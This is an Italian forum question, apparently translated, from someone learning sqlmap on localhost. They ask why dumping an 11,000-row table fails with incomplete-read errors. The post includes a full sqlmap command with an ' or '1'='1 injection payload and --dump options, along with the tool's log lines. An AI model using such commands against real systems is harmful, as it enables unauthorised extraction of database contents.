Scaricamento di una tabella grande mediante Sqlmap

1

Sto imparando / lavorando su sqlmap e stavo cercando di scaricare una tabella di grandi dimensioni con le voci 11K sul mio localhost.

Il comando che ho usato è:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

Si suppone di scaricare la tabella dei tipi dal database degli animali.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

Ho provato ad abbassare i fili ma tutto invano. Cosa devo fare in uno scenario in cui la dimensione della tabella è grande?

    
posta Johnny 09.05.2016 - 12:44
fonte

0 risposte

Leggi altre domande sui tag